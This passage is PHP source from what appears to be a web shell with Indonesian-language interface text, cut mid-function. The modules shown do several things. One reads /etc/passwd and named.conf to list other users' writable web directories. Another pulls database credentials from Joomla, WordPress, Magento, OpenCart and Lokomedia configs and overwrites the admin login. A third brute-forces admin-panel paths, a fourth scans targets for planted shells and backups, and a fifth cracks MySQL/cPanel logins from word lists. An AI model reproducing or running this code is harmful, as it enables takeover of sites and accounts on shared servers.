715. $url = str_replace("www.", "", $url);
716. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
717. if(is_dir($web_vh) === true) {
718. if(is_readable($web_vh)) {
719. $i++;
720. $jrw = "[<font color=Yellow>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
721. if(is_writable($web_vh)) {
722. $jrw = "[<font color=Yellow>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
723. }
724. echo $jrw."<br>";
725. }
726. }
727. }
728. if($i == 0) {
729. } else {
730. echo "<br>Total ada ".$i." jembud di ".$ip;
731. }
732. echo "</pre>";
733. } else {
734. echo '<center>
735. <form method="post">
736. List Domains: <br>
737. <textarea name="url" style="width: 500px; height: 250px;">';
738. bing("ip:$ip");
739. echo '</textarea><br>
740. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
741. </form></center>';
742. }
743. } else {
744. echo "<pre>";
745. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
746. while($passwd = fgets($etc)) {
747. if($passwd == '' || !$etc) {
748. echo "<font color=red>Can't read /etc/passwd</font>";
749. } else {
750. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
751. foreach($user_jumping[1] as $user_idx_jump) {
752. $user_jumping_dir = "/home/$user_idx_jump/public_html";
753. if(is_readable($user_jumping_dir)) {
754. $i++;
755. $jrw = "[<font color=Yellow>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
756. if(is_writable($user_jumping_dir)) {
757. $jrw = "[<font color=Yellow>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
758. }
759. echo $jrw;
760. if(function_exists('posix_getpwuid')) {
761. $domain_jump = file_get_contents("/etc/named.conf");
762. if($domain_jump == '') {
763. echo " => ( <font color=red>domainnya mati di telan bumi</font> )<br>";
764. } else {
765. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
766. foreach($domains_jump[1] as $dj) {
767. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
768. $user_jumping_url = $user_jumping_url['name'];
769. if($user_jumping_url == $user_idx_jump) {
770. echo " => ( <u>$dj</u> )<br>";
771. break;
772. }
773. }
774. }
775. } else {
776. echo "<br>";
777. }
778. }
779. }
780. }
781. }
782. if($i == 0) {
783. } else {
784. echo "<br>Total ada ".$i." jembud di ".$ip;
785. }
786. echo "</pre>";
787. }
788. echo "</div>";
789. } elseif($_GET['do'] == 'auto_edit_user') {
790. if($_POST['hajar']) {
791. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
792. echo "username atau password harus lebih dari 6 karakter";
793. } else {
794. $user_baru = $_POST['user_baru'];
795. $pass_baru = md5($_POST['pass_baru']);
796. $conf = $_POST['config_dir'];
797. $scan_conf = scandir($conf);
798. foreach($scan_conf as $file_conf) {
799. if(!is_file("$conf/$file_conf")) continue;
800. $config = file_get_contents("$conf/$file_conf");
801. if(preg_match("/JConfig|joomla/",$config)) {
802. $dbhost = ambilkata($config,"host = '","'");
803. $dbuser = ambilkata($config,"user = '","'");
804. $dbpass = ambilkata($config,"password = '","'");
805. $dbname = ambilkata($config,"db = '","'");
806. $dbprefix = ambilkata($config,"dbprefix = '","'");
807. $prefix = $dbprefix."users";
808. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
809. $db = mysql_select_db($dbname);
810. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
811. $result = mysql_fetch_array($q);
812. $id = $result['id'];
813. $site = ambilkata($config,"sitename = '","'");
814. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
815. echo "Config => ".$file_conf."<br>";
816. echo "CMS => Joomla<br>";
817. if($site == '') {
818. echo "Sitename => <font color=red>error, domainnya mati ditelan bumi</font><br>";
819. } else {
820. echo "Sitename => $site<br>";
821. }
822. if(!$update OR !$conn OR !$db) {
823. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
824. } else {
825. echo "Status => <font color=Yellow>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
826. }
827. mysql_close($conn);
828. } elseif(preg_match("/WordPress/",$config)) {
829. $dbhost = ambilkata($config,"DB_HOST', '","'");
830. $dbuser = ambilkata($config,"DB_USER', '","'");
831. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
832. $dbname = ambilkata($config,"DB_NAME', '","'");
833. $dbprefix = ambilkata($config,"table_prefix = '","'");
834. $prefix = $dbprefix."users";
835. $option = $dbprefix."options";
836. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
837. $db = mysql_select_db($dbname);
838. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
839. $result = mysql_fetch_array($q);
840. $id = $result[ID];
841. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
842. $result2 = mysql_fetch_array($q2);
843. $target = $result2[option_value];
844. if($target == '') {
845. $url_target = "Login => <font color=red>error, domainnya mati ditelan bumi</font><br>";
846. } else {
847. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
848. }
849. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
850. echo "Config => ".$file_conf."<br>";
851. echo "CMS => Wordpress<br>";
852. echo $url_target;
853. if(!$update OR !$conn OR !$db) {
854. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
855. } else {
856. echo "Status => <font color=Yellow>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
857. }
858. mysql_close($conn);
859. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
860. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
861. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
862. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
863. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
864. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
865. $prefix = $dbprefix."admin_user";
866. $option = $dbprefix."core_config_data";
867. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
868. $db = mysql_select_db($dbname);
869. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
870. $result = mysql_fetch_array($q);
871. $id = $result[user_id];
872. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
873. $result2 = mysql_fetch_array($q2);
874. $target = $result2[value];
875. if($target == '') {
876. $url_target = "Login => <font color=red>error, domainnya mati ditelan bumi</font><br>";
877. } else {
878. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
879. }
880. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
881. echo "Config => ".$file_conf."<br>";
882. echo "CMS => Magento<br>";
883. echo $url_target;
884. if(!$update OR !$conn OR !$db) {
885. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
886. } else {
887. echo "Status => <font color=Yellow>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
888. }
889. mysql_close($conn);
890. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
891. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
892. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
893. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
894. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
895. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
896. $prefix = $dbprefix."user";
897. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
898. $db = mysql_select_db($dbname);
899. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
900. $result = mysql_fetch_array($q);
901. $id = $result[user_id];
902. $target = ambilkata($config,"HTTP_SERVER', '","'");
903. if($target == '') {
904. $url_target = "Login => <font color=red>error, domainnya mati ditelan bumi</font><br>";
905. } else {
906. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
907. }
908. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
909. echo "Config => ".$file_conf."<br>";
910. echo "CMS => OpenCart<br>";
911. echo $url_target;
912. if(!$update OR !$conn OR !$db) {
913. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
914. } else {
915. echo "Status => <font color=Yellow>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
916. }
917. mysql_close($conn);
918. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
919. $dbhost = ambilkata($config,'server = "','"');
920. $dbuser = ambilkata($config,'username = "','"');
921. $dbpass = ambilkata($config,'password = "','"');
922. $dbname = ambilkata($config,'database = "','"');
923. $prefix = "users";
924. $option = "identitas";
925. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
926. $db = mysql_select_db($dbname);
927. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
928. $result = mysql_fetch_array($q);
929. $target = $result[alamat_website];
930. if($target == '') {
931. $target2 = $result[url];
932. $url_target = "Login => <font color=red>error, domainnya mati ditelan bumia</font><br>";
933. if($target2 == '') {
934. $url_target2 = "Login => <font color=red>error, domainnya mati ditelan bumi</font><br>";
935. } else {
936. $cek_login3 = file_get_contents("$target2/adminweb/");
937. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
938. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
939. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
940. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
941. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
942. } else {
943. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
944. }
945. }
946. } else {
947. $cek_login = file_get_contents("$target/adminweb/");
948. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
949. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
950. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
951. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
952. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
953. } else {
954. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
955. }
956. }
957. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
958. echo "Config => ".$file_conf."<br>";
959. echo "CMS => Lokomedia<br>";
960. if(preg_match('/error, domainnya mati ditelan bumi/', $url_target)) {
961. echo $url_target2;
962. } else {
963. echo $url_target;
964. }
965. if(!$update OR !$conn OR !$db) {
966. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
967. } else {
968. echo "Status => <font color=Yellow>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
969. }
970. mysql_close($conn);
971. }
972. }
973. }
974. } else {
975. echo "<center>
976. <h1>Auto Edit User Config</h1>
977. <form method='post'>
978. DIR Config: <br>
979. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
980. Set User & Pass: <br>
981. <input type='text' name='user_baru' value='gandatamvan' placeholder='user_baru'><br>
982. <input type='text' name='pass_baru' value='gandatamvan' placeholder='pass_baru'><br>
983. <input type='submit' name='hajar' value='TUSBOL!1!1!' style='width: 215px;'>
984. </form>
985. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
986. ";
987. }
988. }
989. elseif($_GET['do'] == 'adfin')
990. {
991. set_time_limit(0);
992. error_reporting(0);
993. $list['front'] ="admin
994. adm
995. admincp
996. admcp
997. cp
998. modcp
999. moderatorcp
1000. adminare
1001. admins
1002. cpanel
1003. controlpanel";
1004. $list['end'] = "admin1.php
1005. admin1.html
1006. admin2.php
1007. admin2.html
1008. yonetim.php
1009. yonetim.html
1010. yonetici.php
1011. yonetici.html
1012. ccms/
1013. ccms/login.php
1014. ccms/index.php
1015. maintenance/
1016. webmaster/
1017. adm/
1018. admin@web/
1019. adminweb
1020. 4dm1np4n3l/
1021. 4dm1n/
1022. configuration/
1023. configure/
1024. websvn/
1025. admin/
1026. admin/account.php
1027. admin/account.html
1028. admin/index.php
1029. admin/index.html
1030. admin/login.php
1031. admin/login.html
1032. admin/home.php
1033. admin/controlpanel.html
1034. admin/controlpanel.php
1035. admin.php
1036. admin.html
1037. admin/cp.php
1038. admin/cp.html
1039. cp.php
1040. cp.html
1041. administrator/
1042. administrator/index.html
1043. administrator/index.php
1044. administrator/login.html
1045. administrator/login.php
1046. administrator/account.html
1047. administrator/account.php
1048. administrator.php
1049. administrator.html
1050. login.php
1051. login.html
1052. modelsearch/login.php
1053. moderator.php
1054. moderator.html
1055. moderator/login.php
1056. moderator/login.html
1057. moderator/admin.php
1058. moderator/admin.html
1059. moderator/
1060. account.php
1061. account.html
1062. controlpanel/
1063. controlpanel.php
1064. controlpanel.html
1065. admincontrol.php
1066. admincontrol.html
1067. adminpanel.php
1068. adminpanel.html
1069. admin1.asp
1070. admin2.asp
1071. yonetim.asp
1072. yonetici.asp
1073. admin/account.asp
1074. admin/index.asp
1075. admin/login.asp
1076. admin/home.asp
1077. admin/controlpanel.asp
1078. admin.asp
1079. admin/cp.asp
1080. cp.asp
1081. administrator/index.asp
1082. administrator/login.asp
1083. administrator/account.asp
1084. administrator.asp
1085. login.asp
1086. modelsearch/login.asp
1087. moderator.asp
1088. moderator/login.asp
1089. moderator/admin.asp
1090. account.asp
1091. controlpanel.asp
1092. admincontrol.asp
1093. adminpanel.asp
1094. fileadmin/
1095. fileadmin.php
1096. fileadmin.asp
1097. fileadmin.html
1098. administration/
1099. administration.php
1100. administration.html
1101. sysadmin.php
1102. sysadmin.html
1103. phpmyadmin/
1104. myadmin/
1105. sysadmin.asp
1106. sysadmin/
1107. ur-admin.asp
1108. ur-admin.php
1109. ur-admin.html
1110. ur-admin/
1111. Server.php
1112. Server.html
1113. Server.asp
1114. Server/
1115. wp-admin/
1116. administr8.php
1117. administr8.html
1118. administr8/
1119. administr8.asp
1120. webadmin/
1121. webadmin.php
1122. webadmin.asp
1123. webadmin.html
1124. administratie/
1125. admins/
1126. admins.php
1127. admins.asp
1128. admins.html
1129. administrivia/
1130. Database_Administration/
1131. WebAdmin/
1132. useradmin/
1133. sysadmins/
1134. admin1/
1135. system-administration/
1136. administrators/
1137. pgadmin/
1138. directadmin/
1139. staradmin/
1140. ServerAdministrator/
1141. SysAdmin/
1142. administer/
1143. LiveUser_Admin/
1144. sys-admin/
1145. typo3/
1146. panel/
1147. cpanel/
1148. cPanel/
1149. cpanel_file/
1150. platz_login/
1151. rcLogin/
1152. blogindex/
1153. formslogin/
1154. autologin/
1155. support_login/
1156. meta_login/
1157. manuallogin/
1158. simpleLogin/
1159. loginflat/
1160. utility_login/
1161. showlogin/
1162. memlogin/
1163. members/
1164. login-redirect/
1165. sub-login/
1166. wp-login/
1167. login1/
1168. dir-login/
1169. login_db/
1170. xlogin/
1171. smblogin/
1172. customer_login/
1173. UserLogin/
1174. login-us/
1175. acct_login/
1176. admin_area/
1177. bigadmin/
1178. project-admins/
1179. phppgadmin/
1180. pureadmin/
1181. sql-admin/
1182. radmind/
1183. openvpnadmin/
1184. wizmysqladmin/
1185. vadmind/
1186. ezsqliteadmin/
1187. hpwebjetadmin/
1188. newsadmin/
1189. adminpro/
1190. Lotus_Domino_Admin/
1191. bbadmin/
1192. vmailadmin/
1193. Indy_admin/
1194. ccp14admin/
1195. irc-macadmin/
1196. banneradmin/
1197. sshadmin/
1198. phpldapadmin/
1199. macadmin/
1200. administratoraccounts/
1201. admin4_account/
1202. admin4_colon/
1203. radmind-1/
1204. Super-Admin/
1205. AdminTools/
1206. cmsadmin/
1207. SysAdmin2/
1208. globes_admin/
1209. cadmins/
1210. phpSQLiteAdmin/
1211. navSiteAdmin/
1212. server_admin_small/
1213. logo_sysadmin/
1214. server/
1215. database_administration/
1216. power_user/
1217. system_administration/
1218. ss_vms_admin_sm/
1219. adminarea/
1220. bb-admin/
1221. adminLogin/
1222. panel-administracion/
1223. instadmin/
1224. memberadmin/
1225. administratorlogin/
1226. admin/admin.php
1227. admin_area/admin.php
1228. admin_area/login.php
1229. siteadmin/login.php
1230. siteadmin/index.php
1231. siteadmin/login.html
1232. admin/admin.html
1233. admin_area/index.php
1234. bb-admin/index.php
1235. bb-admin/login.php
1236. bb-admin/admin.php
1237. admin_area/login.html
1238. admin_area/index.html
1239. admincp/index.asp
1240. admincp/login.asp
1241. admincp/index.html
1242. webadmin/index.html
1243. webadmin/admin.html
1244. webadmin/login.html
1245. admin/admin_login.html
1246. admin_login.html
1247. panel-administracion/login.html
1248. nsw/admin/login.php
1249. webadmin/login.php
1250. admin/admin_login.php
1251. admin_login.php
1252. admin_area/admin.html
1253. pages/admin/admin-login.php
1254. admin/admin-login.php
1255. admin-login.php
1256. bb-admin/index.html
1257. bb-admin/login.html
1258. bb-admin/admin.html
1259. admin/home.html
1260. pages/admin/admin-login.html
1261. admin/admin-login.html
1262. admin-login.html
1263. admin/adminLogin.html
1264. adminLogin.html
1265. home.html
1266. rcjakar/admin/login.php
1267. adminarea/index.html
1268. adminarea/admin.html
1269. webadmin/index.php
1270. webadmin/admin.php
1271. user.html
1272. modelsearch/login.html
1273. adminarea/login.html
1274. panel-administracion/index.html
1275. panel-administracion/admin.html
1276. modelsearch/index.html
1277. modelsearch/admin.html
1278. admincontrol/login.html
1279. adm/index.html
1280. adm.html
1281. user.php
1282. panel-administracion/login.php
1283. wp-login.php
1284. adminLogin.php
1285. admin/adminLogin.php
1286. home.php
1287. adminarea/index.php
1288. adminarea/admin.php
1289. adminarea/login.php
1290. panel-administracion/index.php
1291. panel-administracion/admin.php
1292. modelsearch/index.php
1293. modelsearch/admin.php
1294. admincontrol/login.php
1295. adm/admloginuser.php
1296. admloginuser.php
1297. admin2/login.php
1298. admin2/index.php
1299. adm/index.php
1300. adm.php
1301. affiliate.php
1302. adm_auth.php
1303. memberadmin.php
1304. administratorlogin.php
1305. admin/admin.asp
1306. admin_area/admin.asp
1307. admin_area/login.asp
1308. admin_area/index.asp
1309. bb-admin/index.asp
1310. bb-admin/login.asp
1311. bb-admin/admin.asp
1312. pages/admin/admin-login.asp
1313. admin/admin-login.asp
1314. admin-login.asp
1315. user.asp
1316. webadmin/index.asp
1317. webadmin/admin.asp
1318. webadmin/login.asp
1319. admin/admin_login.asp
1320. admin_login.asp
1321. panel-administracion/login.asp
1322. adminLogin.asp
1323. admin/adminLogin.asp
1324. home.asp
1325. adminarea/index.asp
1326. adminarea/admin.asp
1327. adminarea/login.asp
1328. panel-administracion/index.asp
1329. panel-administracion/admin.asp
1330. modelsearch/index.asp
1331. modelsearch/admin.asp
1332. admincontrol/login.asp
1333. adm/admloginuser.asp
1334. admloginuser.asp
1335. admin2/login.asp
1336. admin2/index.asp
1337. adm/index.asp
1338. adm.asp
1339. affiliate.asp
1340. adm_auth.asp
1341. memberadmin.asp
1342. administratorlogin.asp
1343. siteadmin/login.asp
1344. siteadmin/index.asp
1345. ADMIN/
1346. paneldecontrol/
1347. login/
1348. cms/
1349. admon/
1350. ADMON/
1351. administrador/
1352. ADMIN/login.php
1353. panelc/
1354. ADMIN/login.html";
1355. function template() {
1356. echo '
1357.  
1358. <script type="text/javascript">
1359. <!--
1360. function insertcode($text, $place, $replace)
1361. {
1362. var $this = $text;
1363. var logbox = document.getElementById($place);
1364. if($replace == 0)
1365. document.getElementById($place).innerHTML = logbox.innerHTML+$this;
1366. else
1367. document.getElementById($place).innerHTML = $this;
1368. //document.getElementById("helpbox").innerHTML = $this;
1369. }
1370. -->
1371. </script>
1372. <br>
1373. <br>
1374. <h1 class="technique-two">
1375.  
1376.  
1377.  
1378. </h1>
1379.  
1380. <div class="wrapper">
1381. <div class="red">
1382. <div class="tube">
1383. <center><table class="tabnet"><th colspan="2">Admin Finder Recode By RESIS-07</th><tr><td>
1384. <form action="" method="post" name="xploit_form">
1385.  
1386. <tr>
1387. <tr>
1388. <b><td>URL</td>
1389. <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
1390. </td>
1391. </tr><tr>
1392. <td>404 string</td>
1393. <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
1394. </td></b>
1395. </tr><br><td>
1396. <span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Gass Keun" align="center" />
1397. </span></td></tr>
1398. </form></td></tr>
1399. <br /></table>
1400. </div> <!-- /tube -->
1401. </div> <!-- /red -->
1402. <br />
1403. <div class="green">
1404. <div class="tube" id="rightcol">
1405. Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
1406. <b>Found ones:<br /></b>
1407. </div> <!-- /tube -->
1408. </div></center><!-- /green -->
1409. <br clear="all" /><br />
1410. <div class="blue">
1411. <div class="tube" id="logbox">
1412. <br />
1413. <br />
1414. Admin page Finder :<br /><br />
1415. </div> <!-- /tube -->
1416. </div> <!-- /blue -->
1417. </div> <!-- /wrapper -->
1418. <br clear="all"><br>';
1419. }
1420. function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
1421. if($br == 1) $msg .= "<br />";
1422. echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
1423. if($stop == 1) exit;
1424. @flush();@ob_flush();
1425. }
1426. function check($x, $front=0) {
1427. global $_POST,$site,$false;
1428. if($front == 0) $t = $site.$x;
1429. else $t = 'http://'.$x.'.'.$site.'/';
1430. $headers = get_headers($t);
1431. if (!eregi('200', $headers[0])) return 0;
1432. $data = @file_get_contents($t);
1433. if($_POST['xploit_404string'] == "") if($data == $false) return 0;
1434. if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
1435. return 1;
1436. }
1437.  
1438. // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1439. template();
1440. if(!isset($_POST['xploit_url'])) die;
1441. if($_POST['xploit_url'] == '') die;
1442. $site = $_POST['xploit_url'];
1443. if ($site[strlen($site)-1] != "/") $site .= "/";
1444. if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
1445. $list['end'] = str_replace("\r", "", $list['end']);
1446. $list['front'] = str_replace("\r", "", $list['front']);
1447. $pathes = explode("\n", $list['end']);
1448. $frontpathes = explode("\n", $list['front']);
1449. show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
1450. $verificate = 0;
1451. foreach($pathes as $path) {
1452. show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
1453. $verificate++; show($verificate, 0, 0, 'verified', 1);
1454. if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
1455. else{
1456. show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
1457. show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
1458. }
1459. }
1460. preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
1461. if(substr($site, 0, 3) == "www") $site = substr($site, 4);
1462. foreach($frontpathes as $frontpath) {
1463. show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
1464. $verificate++; show($verificate, 0, 0, 'verified', 1);
1465. if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
1466. else{
1467. show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
1468. show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
1469. }
1470.  
1471. }
1472. }
1473. elseif($_GET['do'] == 'shellscan') {
1474. echo'<center><h2>Shell Finder</h2>
1475. <form action="" method="post">
1476. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
1477. <br>
1478. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
1479. </form><br>';
1480. if (isset($_POST["scan"])) {
1481. $url = $_POST['traget'];
1482. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
1483. echo "Result :<br />";
1484. $shells = array("WSO.php","idx.php","indo.php","xai.php","noname.php","images/indo.php","images/ind.php","images/noname.php","wp-content/uploads/plugins/xaisyndicate/xaishell.php","wp-content/plugins/asu/ea.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
1485. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
1486. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
1487. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
1488. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
1489. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
1490. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
1491. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
1492. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
1493. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
1494. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
1495. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
1496. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
1497. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
1498. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
1499. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
1500. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
1501. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
1502. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
1503. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
1504. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
1505. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
1506. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
1507. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
1508. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","chonx.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
1509. foreach ($shells as $shell){
1510. $headers = get_headers("$url$shell"); //
1511. if (eregi('200', $headers[0])) {
1512. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
1513. $dz = fopen('shells.txt', 'a+');
1514. $suck = "$url$shell";
1515. fwrite($dz, $suck."\n");
1516. }
1517. }
1518. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
1519. }
1520. } elseif($_GET['do'] == 'cpanel') {
1521. if($_POST['crack']) {
1522. $usercp = explode("\r\n", $_POST['user_cp']);
1523. $passcp = explode("\r\n", $_POST['pass_cp']);
1524. $i = 0;
1525. foreach($usercp as $ucp) {
1526. foreach($passcp as $pcp) {
1527. if(@mysql_connect('localhost', $ucp, $pcp)) {
1528. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1529. } else {
1530. $_SESSION[$ucp] = "1";
1531. $_SESSION[$pcp] = "1";
1532. if($ucp == '' || $pcp == '') {
1533.  
1534. } else {
1535. $i++;
1536. if(function_exists('posix_getpwuid')) {
1537. $domain_cp = file_get_contents("/etc/named.conf");
1538. if($domain_cp == '') {
1539. $dom = "<font color=red>domainnya mati ditelan bumi</font>";
1540. } else {
1541. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1542. foreach($domains_cp[1] as $dj) {
1543. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
